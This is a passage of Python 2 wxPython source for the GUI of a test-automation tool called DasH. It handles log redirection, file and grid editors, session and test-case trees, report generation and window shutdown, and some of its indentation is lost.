            err_pattern = self.error_pattern#re.compile('error|\s+err\s+|fail|wrong')
            #wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
            # Disabled: highlight error-matching substrings in red/yellow.
            if False:#err_pattern.search(string.lower()):
                last_start = 0
                for m in err_pattern.finditer(string.lower()):
                    #print(m.start(), m.end(), m.group())
                    #wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
                    self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
                    self.out.AppendText( string[last_start:m.start()])
                    self.out.SetDefaultStyle(wx.TextAttr(wx.RED, wx.YELLOW,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
                    #wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.RED, wx.YELLOW,font =wx.Font(self.font_point+2, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
                    self.out.AppendText( string[m.start():m.end()])
                    last_start= m.end()
                #wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
                self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
                self.out.AppendText( string[last_start:])
            else:
                self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
                # AppendText must run on the GUI thread, hence CallAfter.
                wx.CallAfter(self.out.AppendText, string)
            if self.log_file:
                self.log_file.write(string)
                self.log_file.flush()
        except:
            pass
        self.write_lock.release()
    def close(self):
        # Flush and close the log file (the wx control is owned elsewhere).
        if self.log_file:
            self.log_file.flush()
            self.log_file.close()
    def flush(self):
        if self.log_file:
            self.log_file.flush()
class process_info(object):
    """Lightweight record describing one spawned test-case process.

    Wraps a subprocess-like object and exposes its pid, the case's full name
    and a live 'returncode' (always reflecting the wrapped process's current
    return code).
    """
    process = None
    pid=None
    full_name=None
    def __init__(self,name, process):
        self.process= process
        self.pid = process.pid
        self.full_name =name
        # BUG FIX: the original also did 'self.returncode = process.returncode',
        # but 'returncode' is a read-only property below, so that assignment
        # raised AttributeError on every construction.  The property already
        # reports the live value, so no instance attribute is needed.
    @property
    def returncode(self):
        # Delegate so callers always see the wrapped process's current state.
        return self.process.returncode
class FileEditor(wx.Panel):
    """Editor panel for one file tab: a text control for 'text' files or a
    wx.grid for case grids.  Saves its contents back to disk on close."""
    editor =None
    font_size=10
    parent=None
    type = None
    sessions_node =None
    function_node =None
    case_suite_node =None
    full_file_name = None
    file_instance = None
    def on_close(self):
        # Persist the editor's current contents back to the backing file.
        if self.full_file_name:
            data = self.editor.GetValue()
            with open(self.full_file_name, 'w') as f:
                f.write(data)
                f.flush()
    #done 2017-9-12: handle close tab in edit_area
    def __init__(self, parent, title='pageOne', type ='grid', file_name = None):
        wx.Panel.__init__(self, parent)
        self.parent = parent
        self.type = type
        self.full_file_name = file_name
        #self.editor = wx.TextCtrl(self, style = wx.TE_MULTILINE|wx.TE_RICH2|wx.EXPAND|wx.ALL, size=(-1,-1))
        if type in ['text']:
            # Plain text view: load the whole file into a rich text control.
            self.editor = wx.TextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_AUTO_URL|wx.VSCROLL|wx.TE_RICH|wx.TE_MULTILINE&(~wx.TE_PROCESS_ENTER))
            #wx.richtext.RichTextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS )
            with open(self.full_file_name, 'r') as f:
                for line in f.readlines():
                    self.editor.AppendText(line)
        else:
            # Grid view: column 0 is the function name, the rest are arguments.
            self.editor= gridlib.Grid(self)
            self.editor.CreateGrid(50, 5)
            col = self.editor.GetNumberCols()
            row = self.editor.GetNumberRows()
            function_color ='black'
            arg_color = 'blue'
            for c in range(0, col):
                if c < 1 :
                    self.editor.SetColLabelValue(c, 'Function Name')
                else:
                    self.editor.SetColLabelValue(c, 'arg# {}'.format(c))
                for r in range (0, row):
                    self.editor.SetCellTextColour(r,c,function_color if c <1 else arg_color)
            for r in range (0, row):
                self.editor.SetCellFont(r, 0, wx.Font(self.font_size,wx.SWISS, wx.NORMAL, wx.BOLD ))
        self.editor.Bind( wx.EVT_MOUSEWHEEL, self.editor_OnMouseWheel )
        sizer = wx.BoxSizer()
        sizer.Add(self.editor, 1, wx.EXPAND)
        self.SetSizer(sizer)
    def editor_OnMouseWheel(self,event):
        # Ctrl + mouse wheel zooms the editor font in/out.
        min_font_size = 5
        interval_step = 2
        if event.ControlDown():
            pass
        else:
            return
        if event.GetWheelRotation() < 0:
            if self.font_size>min_font_size:
                self.font_size-=interval_step
        else:
            self.font_size+=1
        if self.type in ['text']:
            f =self.editor.GetFont()
            f.PointSize= self.font_size
            self.editor.SetFont(f)
        else:
            # Grid cells carry individual fonts: resize each one.
            col = self.editor.GetNumberCols()
            row = self.editor.GetNumberRows()
            for c in range(0, col):
                for r in range (0, row):
                    f = self.editor.GetCellFont(r, c)
                    f.PointSize = self.font_size
                    self.editor.SetCellFont(r, c, f)
        self.Refresh()
    #wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#DONE: DasHFrame should handle CLOSE event when closing the app, call on_close_tab_in_edit_area for all opened sessions and files
from functools import wraps
import pprint
def gui_event_thread_handler( func):
    """Decorator for GUI event handlers: run *func*, swallow and log errors.

    Returns func's result, or None when func raised (the traceback is logged
    via error()).
    """
    @wraps(func)
    def inner(*args, **kwargs):
        # BUG FIX: the original wrapper was 'def inner(func, *args, **kwargs)',
        # which shadowed the decorated function with the first call argument
        # and tried to call THAT instead -- every decorated call failed.
        ret =None
        try:
            ret = func(*args, **kwargs)
            #th = threading.Thread(target=func,args= args, kwargs=kwargs)
            #th.start()
        except:
            error(traceback.format_exc())
        return ret
    return inner
class gui_event_decorator():
    """Mixin providing gui_even_handle: a decorator that runs GUI event
    handlers on a background thread so the event loop never blocks."""
    def __init__(self):
        pass
    @classmethod
    def gui_even_handle(self, func):
        """Wrap *func* so each invocation is dispatched to a worker thread.

        The wrapper always returns None (the handler runs asynchronously);
        any error while spawning the thread is printed and swallowed.
        """
        def inner(*args, **kwargs):
            result = None
            try:
                #print('decorator!!!')
                worker = threading.Thread(target=func, args=args, kwargs=kwargs)
                worker.start()
                #print('decorator####')
            except:
                print(traceback.format_exc())
            return result
        return inner
class DasHFrame(MainFrame, gui_event_decorator):#wx.Frame
    """Main DasH application frame.

    The class attributes below are defaults; most are replaced per-instance
    in __init__ (paths and mail/web settings come from gDasH.ini).
    NOTE(review): the mutable defaults (history_cmd, import_modules,
    mailed_case_pids, dict_function_obj, dict_function_files) are shared
    across instances -- fine for a single-frame app, but worth confirming.
    """
    ini_setting = None
    #m_left_navigator =None
    # RedirectText instance capturing stdout/stderr into the log window.
    redir = None
    edit_area=None
    tabs_in_edit_area = None
    src_path = './src/'
    sessions_alive=None
    sequence_queue=None
    # Command-box history, navigated with the up/down keys.
    history_cmd = []
    history_cmd_index = -1
    import_modules={'TC':''}
    lib_path ='./lib'
    log_path = '../log/dash'
    session_path = './sessions'
    suite_path = '../test_suite'
    # Per-case run records; see on_kill_running_case for the field layout.
    dict_test_report= ''
    alive =True
    # Mail-based remote control settings (overridden from gDasH.ini).
    mail_server=None
    mail_to_list=None
    mail_from=None
    mail_read_url= 'outlook.office365.com'
    mail_password = None
    mail_user ='nonexistent@dash.com'
    case_queue =None
    check_case_running_status_lock = None
    case_list=None
    #session_names={}
    # Embedded HTTP control server state (see web_server_start).
    web_daemon = None
    web_host = None
    web_port = 8888
    mailed_case_pids= []
    timestamp=None
    # True while mailbox polling is failing (shown to the user elsewhere).
    mail_failure =False
    last_time_call_on_idle= None
    ini_file=None
    dict_function_obj= {'instance':{}}
    dict_function_files = {}
def __init__(self,parent=None, ini_file = './gDasH.ini'):
#wx.Frame.__init__(self, None, title="DasH")
gui_event_decorator.__init__(self)
self.timestamp= datetime.now().isoformat('-').replace(':','-')
self.case_list= []
self.case_queue = Queue.Queue()
self.dict_test_report={}
self.check_case_running_status_lock = threading.Lock()
self.tabs_in_edit_area=[]
self.sessions_alive={}
MainFrame.__init__(self, parent=parent)
self.sequence_queue= Queue.Queue()
#self.sequence_queue.put()
self.ini_setting = ConfigParser.ConfigParser()
if os.path.exists(ini_file):
self.ini_setting.read(ini_file)
self.src_path = os.path.abspath(self.ini_setting.get('dash','src_path'))
self.lib_path = os.path.abspath(self.ini_setting.get('dash','lib_path'))
self.log_path = os.path.abspath(self.ini_setting.get('dash','log_path'))
self.suite_path = os.path.abspath(self.ini_setting.get('dash', 'test_suite_path'))
self.mail_server = self.ini_setting.get('dash', 'mail_server')
self.mail_from =self.ini_setting.get('dash', 'mail_from')
self.mail_to_list =self.ini_setting.get('dash', 'mail_to_list')
self.mail_read_url =self.ini_setting.get('dash', 'mail_read_url')
self.mail_user = self.ini_setting.get('dash','mail_user')
self.mail_password =self.ini_setting.get('dash', 'mail_password')
self.web_port =int(self.ini_setting.get('dash', 'web_port'))
else:
with open(ini_file, 'w') as tmp_ini_file:
tmp_ini_file.write('''[dash]
test_suite_path = ../test_suite/
log_path= {log_path}
lib_path = {lib_path}
session_path={session_path}
#the source python file folder
src_path = {src_path}
mail_server={mail_server}
mail_to_list={mail_to_list}
mail_user={mail_user}
mail_from ={mail_from}
mail_read_url={mail_read_url}
mail_password = {mail_password}
web_port={web_port}
'''.format(
log_path = self.log_path,
lib_path = self.lib_path,
session_path = self.session_path,
src_path = self.src_path,
mail_server = self.mail_server,
mail_to_list = self.mail_to_list,
mail_user = self.mail_user,
mail_from = self.mail_from,
mail_read_url = self.mail_read_url,
mail_password = self.mail_password,
web_port = self.web_port))
tmp_ini_file.flush()
#self.ini_setting.read(ini_file)
self.ini_file = ini_file
from lib.common import create_case_folder, create_dir
sys.argv.append('-l')
sys.argv.append('{}'.format(self.log_path))
from lib.common import create_dir
self.log_path = create_dir(self.log_path)
self.suite_path = create_dir(self.suite_path)
self.lib_path = create_dir(self.lib_path)
self.src_path = create_dir(self.src_path)
if not os.path.exists(self.log_path):
os.mkdir(self.log_path)
self.add_src_path_to_python_path(self.src_path)
self.redir = RedirectText(self.m_log, self.log_path)
sys.stdout = self.redir
sys.stderr = self.redir
self.m_log.SetBackgroundColour('Black')
self.m_log.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font =wx.Font(9, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.BOLD, faceName = 'Consolas')))
#self.m_editor.WriteText('welcome to dash world')
self.m_log.WriteText('Welcome to DasH!\n')
self.m_command_box.WriteText('functions.static_function_in_module test_ssh 2')
fileMenu = wx.Menu()
#open_test_suite = fileMenu.Append(wx.NewId(), "Open TestSuite", "Open a Test Suite")
#open_test_case = fileMenu.Append(wx.NewId(), "Open TestCase", "Open a Test Case")
generate_test_report = fileMenu.Append(wx.NewId(), "Generate Test Report", "Generate Test Report")
generate_code = fileMenu.Append(wx.NewId(), "Generate Python Code", "Generate Python Code")
mail_test_report = fileMenu.Append(wx.NewId(), "Mail Test Report", "Mail Test Report")
get_case_queue = fileMenu.Append(wx.NewId(), "Get Case Queue", "Get Case Queue") #done
clear_case_queue = fileMenu.Append(wx.NewId(), "Clear Case Queue", "Clear Case Queue")
kill_running_case = fileMenu.Append(wx.NewId(), "Kill Running Case(s)", "Kill Running Case(s)")
self.m_menubar_main.Append(fileMenu, "&Operations")
self.Bind(wx.EVT_MENU,self.on_generate_test_report ,generate_test_report)
self.Bind(wx.EVT_MENU,self.on_generate_code ,generate_code)
self.Bind(wx.EVT_MENU,self.on_mail_test_report ,mail_test_report)
self.Bind(wx.EVT_MENU,self.get_case_queue ,get_case_queue)
self.Bind(wx.EVT_MENU,self.on_clear_case_queue ,clear_case_queue)
self.Bind(wx.EVT_MENU,self.on_kill_running_case ,kill_running_case)
self.Bind(wx.EVT_CLOSE, self.on_close)
self.m_command_box.Bind(wx.EVT_TEXT_ENTER, self.on_command_enter)
self.m_command_box.Bind(wx.EVT_KEY_UP, self.on_key_up)
self.m_command_box.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
from wx.aui import AuiNotebook
bookStyle = wx.aui.AUI_NB_DEFAULT_STYLE &(~wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB)
self.navigator = AuiNotebook(self.m_left_navigator, style= bookStyle )
self.case_suite_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.function_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.session_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.navigator.AddPage(self.session_page, 'SESSION')
self.navigator.AddPage(self.function_page, 'FUNCTION')
self.navigator.AddPage(self.case_suite_page, 'CASE')
self.edit_area = AuiNotebook(self.m_file_editor, style = wx.aui.AUI_NB_DEFAULT_STYLE)
if False:
new_page = FileEditor(self.edit_area, 'a', type= type)
self.edit_area.AddPage(new_page, 'test')
self.tabs_in_edit_area.append(('test'))
self.edit_area.Enable(True)
right_sizer = wx.BoxSizer(wx.VERTICAL)
#right_sizer =wx.GridSizer( 3, 1, 0, 0 )
left_sizer = wx.BoxSizer(wx.HORIZONTAL)
left_sizer.Add(self.m_left_navigator, 1, wx.EXPAND)
self.case_suite_page.Bind(wx.EVT_LEFT_DCLICK, self.m_case_treeOnLeftDClick)
#self.case_suite_page.Bind(wx.EVT_MOUSEWHEEL, self.case_tree_OnMouseWheel)
self.case_suite_page.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.m_case_treeOnTreeItemExpanding)
self.session_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Session_tab)
self.function_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Function_tab)
self.function_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_function_tab)
self.case_suite_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_case_tab)
self.session_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_session_tab)
self.edit_area.Bind(wx.aui.EVT__AUINOTEBOOK_TAB_RIGHT_DOWN, self.on_right_up_over_tab_in_edit_area)
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer = wx.GridSizer( 1, 2, 0, 0 )
nav_sizer = wx.BoxSizer()
nav_sizer.Add(self.navigator, 1, wx.EXPAND, 1)
self.m_left_navigator.SetSizer(nav_sizer)
#main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer.Add(left_sizer, 3, wx.EXPAND)
main_sizer.Add(left_sizer, 2, wx.EXPAND)
edit_sizer = wx.BoxSizer()
edit_sizer.Add(self.edit_area, 1, wx.EXPAND, 1)
self.m_file_editor.SetSizer(edit_sizer)
right_sizer.Add(self.m_file_editor, 8, wx.ALL|wx.EXPAND, 1)
right_sizer.Add(self.m_log, 2, wx.ALL|wx.EXPAND, 2)
right_sizer.Add(self.m_command_box, 0, wx.ALL|wx.EXPAND, 3)
main_sizer.Add(right_sizer, 8, wx.EXPAND)
self.SetSizer(main_sizer)
ico = wx.Icon('./gui/dash.bmp', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
#th= threading.Thread(target=self.polling_running_cases)
#th.start()
#th = threading.Thread(target=self.polling_request_via_mail)
#th.start()
threading.Thread(target=self.web_server_start).start()
#tooltips bind
self.case_suite_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
self.session_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
self.function_page.Bind(wx.EVT_MOTION, self.OnMouseMotion)
#wx.html.EVT_HTML_LINK_CLICKED wx.EVT_TEXT_URL, wx.EVT_TEXT_URL,
self.m_log.Bind(wx.EVT_TEXT_URL, self.on_leftD_click_url_in_m_log)
self.Bind(wx.EVT_IDLE, self.on_idle)
self.last_time_call_on_idle = datetime.now()
self.build_session_tab()
self.build_suite_tree()
self.build_function_tab()
self.Show(True)
self.Maximize()
    def on_close(self, event):
        """Handle main-window close: restore stdio, stop background threads,
        persist the recorded command sequence, mail the final report and shut
        every open session tab down."""
        try:
            # Signal the polling/background loops to stop.
            self.alive =False
            # Restore the real stdout/stderr before the log widget is destroyed.
            sys.stderr =self.redir.old_stderr
            sys.stdout = self.redir.old_stdout
            self.redir.close()
            event.Skip()
        except Exception as e:
            error(traceback.format_exc())
        self.Show(False)
        time.sleep(0.01)
        def close():
            # Best-effort shutdown of the embedded web server.
            try:
                self.web_daemon.shutdown()
            except:
                pass
            # Persist the recorded command sequence as a runnable script.
            self.generate_code(file_name='{}/test_script.py'.format(self.suite_path))
            # Mail a final report only if any case was actually run.
            if len(self.dict_test_report):
                self.mail_test_report("DASH TEST REPORT")
            # Close every open session tab so its connection is released.
            for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
                closing_page = self.edit_area.GetPage(index)
                if isinstance(closing_page, (SessionTab)):
                    if closing_page:
                        name = closing_page.name
                        self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(name))
                        try:
                            closing_page.on_close()
                        except:
                            pass
        close()
        time.sleep(0.01)
        #sys.exit(0)
def generate_report(self, filename, report_all_cases=True):
#fixed 2017-11-19, 2017-10-21 no need to send whole report, just the updating part
def GetTime(duration):
from datetime import timedelta
sec = timedelta(seconds=int(duration))
d = datetime(1,1,1) + sec
#print("DAYS:HOURS:MIN:SEC")
return "%d:%d:%d:%d" % (d.day-1, d.hour, d.minute, d.second)
report_in_list =[['result',
'start_time',
'end_time',
'ProcessID',
'duration',
'duration',
'case_name','log']]
report = '''Test Report
RESULT,\tStart_Time,\tEnd_Time,\tPID,\tDuration(s),\tDuration(D:H:M:S)\tCase_Name,\tLog\n'''
with open(filename, 'w') as f:
if len(self.dict_test_report):
#f.write(report)
for pi in sorted(self.dict_test_report, key = lambda x: self.dict_test_report[x][1]):
case_name, start_time, end_time, duration, return_code ,proc, log_path =self.dict_test_report[pi][:7]
if return_code is None:
result = 'IP'
result_html = '<font color="blue">IP'
else:
result = return_code # 'FAIL' if return_code else 'PASS'
if result.lower() in ['pass']:
result_html= '<font color="green">PASS'
else:
result_html= '<font color="red">FAIL'
one_record = ['{}'.format(x) for x in [
result,
start_time,
end_time,
pi,
duration,
GetTime(duration),
case_name,
'{html_link} {file_path}'.format(
file_path=log_path,
html_link = log_path.replace(
self.log_path,
'http://{}:{}/log/'.format(self.web_host,self.web_port)
).replace('/\\',r'/')
) ]]
one_record_html = ['{}'.format(x) for x in [
result_html,
start_time,
end_time,
pi,
duration,
GetTime(duration),
case_name,
'<a href={html_link}>{file_path}</a>'.format(
file_path=log_path,
html_link = log_path.replace(
self.log_path,
'http://{}:{}/log/'.format(self.web_host,self.web_port)
).replace('/\\',r'/')
) ]]
report_in_list.append(one_record_html)
record = '\t'.join(one_record)
if result == 'IP':
report+=record+'\n'
else:
if report_all_cases:
report+=record+'\n'
self.mailed_case_pids.append(pi)
elif pi not in self.mailed_case_pids:
report+=record+'\n'
self.mailed_case_pids.append(pi)
else:
pass
from lib.common import array2htmltable
report_in_html_string = array2htmltable(report_in_list)
f.write(report_in_html_string)
return report
    def on_close_tab_in_edit_area(self, event):
        """Handle closing of a tab in the editor notebook; for session tabs
        also tear down the underlying session and drop its global entry."""
        #self.edit_area.GetPage(self.edit_area.GetSelection()).on_close()
        def close_tab():
            global gSessions
            closing_page = self.edit_area.GetPage(self.edit_area.GetSelection())
            closing_page.on_close()
            if isinstance(closing_page, (SessionTab)):
                ses_name = closing_page.name
                self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(ses_name))
                # Close and deregister the session object registered under
                # this tab's name.
                if gSessions.has_key( ses_name):
                    # globals().has_key(ses_name):
                    #g = dict(globals())
                    #globals()[ses_name]=None
                    #del g[ses_name]
                    gSessions[ses_name].close_session()
                    del gSessions[ses_name] #del globals()[ses_name]
        # Run in a thread so a slow close_session() does not freeze the GUI.
        threading.Thread(target=close_tab, args=[]).start()
        event.Skip()
def add_item_to_subfolder_in_tree(self,node):
subfolder_path_name = self.case_suite_page.GetPyData(node)['path_name']
items = get_folder_item(subfolder_path_name)
if items is None:
self.case_suite_page.SetItemText(node, self.m_case_tree.GetItemText(node) + ' Not Exists!!!')
self.case_suite_page.SetItemTextColour(node, wx.Colour(255, 0, 0))
return
for i in items:
path_name = '{}/{}'.format(subfolder_path_name,i)
base_name = os.path.basename(i)
item_info = wx.TreeItemData({'path_name':path_name})
self.case_list.append(path_name)
new_item = self.case_suite_page.InsertItem(node, node, base_name)
self.case_suite_page.SetItemData(new_item, item_info)
if os.path.isdir(path_name):
self.case_suite_page.SetItemHasChildren(new_item)
#self.m_case_tree.ItemHasChildren()
#self.m_case_tree.InsertItem(new_item,new_item,'')
    @gui_event_decorator.gui_even_handle
    def build_suite_tree(self):
        """(Re)build the root of the Case tree from the test-suite folder."""
        suite_path = self.suite_path #os.path.abspath(self.ini_setting.get('dash','test_suite_path'))
        # Fall back to the current directory when the configured path is gone.
        if not os.path.exists(suite_path):
            suite_path= os.path.abspath(os.path.curdir)
        base_name = os.path.basename(suite_path)
        root =self.case_suite_page.AddRoot(base_name)
        item_info = wx.TreeItemData({'path_name':suite_path})
        self.case_suite_page.SetItemData(root, item_info)
        # First level of children; deeper levels are loaded lazily on expand.
        self.add_item_to_subfolder_in_tree(root)
        self.case_suite_page.Expand(root)
    # def OnSelChanged(self, event):
    #     item = event.GetItem()
    #     self.display.SetLabel(self.tree.GetItemText(item))
    #def case_tree_OnMouseWheel(self, event):
def m_case_treeOnLeftDClick(self, event):
ht_item =self.case_suite_page.GetSelection()
#ht_item = self.HitTest(event.GetPosition())
item_name = self.case_suite_page.GetItemText(ht_item)
item_data = self.case_suite_page.GetItemData(ht_item)
if self.case_suite_page.ItemHasChildren(ht_item):
if self.case_suite_page.IsExpanded(ht_item):
self.case_suite_page.Collapse(ht_item)
else:
self.case_suite_page.ExpandAllChildren(ht_item)
else:
if item_name.lower() in ['.csv', '.xlsx','.xls']:
type = 'grid'
file_name = item_data.Data['path_name']
else:
type = 'text'
file_name = item_data.Data['path_name']
new_page = FileEditor(self.edit_area, 'a', type= type,file_name=file_name)
self.edit_area.AddPage(new_page, item_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
    def m_case_treeOnTreeItemExpanding(self,event):
        """Lazily populate a Case-tree folder node the first time it expands."""
        ht_item =self.case_suite_page.GetSelection()
        try:
            item_info = self.case_suite_page.GetPyData(ht_item)
            # Only load children once: an already-populated node is skipped.
            if 0== self.case_suite_page.GetChildrenCount(ht_item):
                if os.path.isdir(item_info['path_name']):
                    self.add_item_to_subfolder_in_tree(ht_item)
        except Exception as e:
            # NOTE(review): errors (e.g. stale tree item data) are silently
            # swallowed here.
            pass
@gui_event_decorator.gui_even_handle
def build_session_tab(self):
if self.session_page.RootItem:
self.session_pagef.DeleteAllItems()
self.ini_setting.read(self.ini_file)
session_path = os.path.abspath(self.ini_setting.get('dash','session_path'))
self.session_path= session_path
if not os.path.exists(session_path):
session_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(session_path)
sessions = {}
root =self.session_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':session_path})
self.session_page.SetItemData(root, item_info)
self.session_page.Expand(root)
item_list = get_folder_item(session_path)
session_files=[]
for item in item_list:
if os.path.isfile('{}/{}'.format(session_path,item)) and '{}'.format(item).lower().strip().endswith('.csv'):
session_files.append(item)
for csv_file in sorted(session_files):
try:
ses_in_bench = load_bench(os.path.abspath('{}/{}'.format(session_path, csv_file)))
for bench in ses_in_bench:
for ses in ses_in_bench[bench]:
if ses_in_bench[bench][ses].has_key('login_step') and ses_in_bench[bench][ses]['login_step'].strip() not in ['', None]:
ses_in_bench[bench][ses].update(
{'login_step': os.path.abspath('{}/{}'.format(session_path, ses_in_bench[bench][ses]['login_step'].strip()))}
)
sessions.update(ses_in_bench)
except Exception as e:
error(traceback.format_exc())
root =self.session_page.GetRootItem()
for file_name in sorted(sessions.keys()):
item_name = os.path.basename(file_name)
item_info = wx.TreeItemData({'file_name':file_name})
new_bench = self.session_page.InsertItem(root, root, item_name)
self.case_suite_page.SetItemData(new_bench, item_info)
for ses in sorted(sessions[file_name]):
item_name = ses
item_info = wx.TreeItemData({'attribute':sessions[file_name][ses]})
new_item = self.session_page.InsertItem(new_bench, new_bench, item_name)
self.case_suite_page.SetItemData(new_item, item_info)
self.session_page.Expand(root)
first_child = self.session_page.GetFirstChild(root)
self.session_page.Expand(first_child[0])
    #@gui_event_decorator.gui_even_handle
    def on_LeftDClick_in_Session_tab(self, event):
        """Open a new SessionTab for the double-clicked session entry.

        The tab name is made unique against the open tabs and against module
        globals before the session page is created and registered.
        """
        ses_name = self.session_page.GetItemText(self.session_page.GetSelection())
        self.session_page.GetItemText(self.session_page.GetSelection())
        session_attribute = self.session_page.GetItemData(self.session_page.GetSelection())
        # Only leaf items carry an 'attribute' dict; bench nodes do not.
        if session_attribute.Data.has_key('attribute'):
            info(session_attribute.Data['attribute'])
            counter =1
            original_ses_name = ses_name
            # Rebuild the open-tab name list from the notebook itself.
            tmp_tabs =[]
            for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
                tab_page = self.edit_area.GetPage(index)
                #tab_page.name
                tmp_tabs.append(tab_page.name)
            self.tabs_in_edit_area = tmp_tabs
            # Suffix _1, _2, ... until the tab name is unique.
            while ses_name in self.tabs_in_edit_area:
                ses_name= '{}_{}'.format(original_ses_name,counter)
                counter+=1
            # Avoid clashing with an existing module-level variable name.
            if globals().has_key(ses_name):
                if not globals().has_key('_{}'.format(ses_name)):
                    info("variable '{}' is existed in global, change the name to _{}".format(ses_name, ses_name))
                    ses_name='_{}'.format(ses_name)
                    self.session_page.SetItemText(self.session_page.GetSelection(), ses_name)
                else:
                    error(("variable '{}' is existed in global, please change the name".format(ses_name)))
                    return
            new_page = SessionTab(self.edit_area, ses_name, session_attribute.Data['attribute'], self.sequence_queue, log_path=self.log_path+'/session_log')
            window_id = self.edit_area.AddPage(new_page, ses_name)
            index = self.edit_area.GetPageIndex(new_page)
            self.edit_area.SetSelection(index)
            self.tabs_in_edit_area.append(ses_name)
            self.sessions_alive.update({ses_name: new_page.name})
            attribute = session_attribute.Data['attribute']
            # Placeholder path; generate_code()/add_new_session_to_globals
            # substitutes it with the real log_path variable later.
            log_path='a_fake_log_path_for_auto_script'
            attribute['log_path']=log_path
            self.add_new_session_to_globals(new_page, '{}'.format(attribute))
            #globals().update({ses_name: new_page.session})
            time.sleep(0.1)
        event.Skip()
    def add_new_session_to_globals(self, new_page, args_str):
        """Register *new_page* in the global DUT table and queue the matching
        dut.dut(...) construction line for the generated script.

        @param new_page: the SessionTab just created for this session.
        @param args_str: repr of the session's attribute dict, used verbatim
               as the **kwargs in the generated code line.
        """
        name = new_page.name
        global DUT
        #FIX ISSUE
        #    INFO  common.py:161 call_function_in_module:
        #    module_name: xdsl
        #    class_name: xdsl
        #    function_name: get_eut
        #    args:[wxPython wrapper for DELETED SessionTab object! (The C++ object no longer exists.)]
        #    kwargs: {}
        #    Exception in thread Thread-40:
        #    Traceback (most recent call last):
        #      File "C:\Python27\Lib\threading.py", line 801, in __bootstrap_inner
        #        self.run()
        #      File "C:\Python27\Lib\threading.py", line 754, in run
        #        self.__target(*self.__args, **self.__kwargs)
        #      File "C:\workspace\gDasH\src\xdsl.py", line 36, in get_eut
        #        ses.write(cmd)
        #      File "C:\Python27\lib\site-packages\wx-3.0-msw\wx\_core.py", line 16711, in __getattr__
        #        raise PyDeadObjectError(self.attrStr % self._name)
        if name in DUT:
            try:
                # Probe the stored wx wrapper: accessing .name on a deleted
                # wx object raises (see traceback above), in which case the
                # stale entry is simply replaced.
                DUT[name].name
                del DUT[name]
            except :
                DUT[name]= new_page
        else:
            DUT[name]= new_page
        # Queue the equivalent construction line; the fake log path marker is
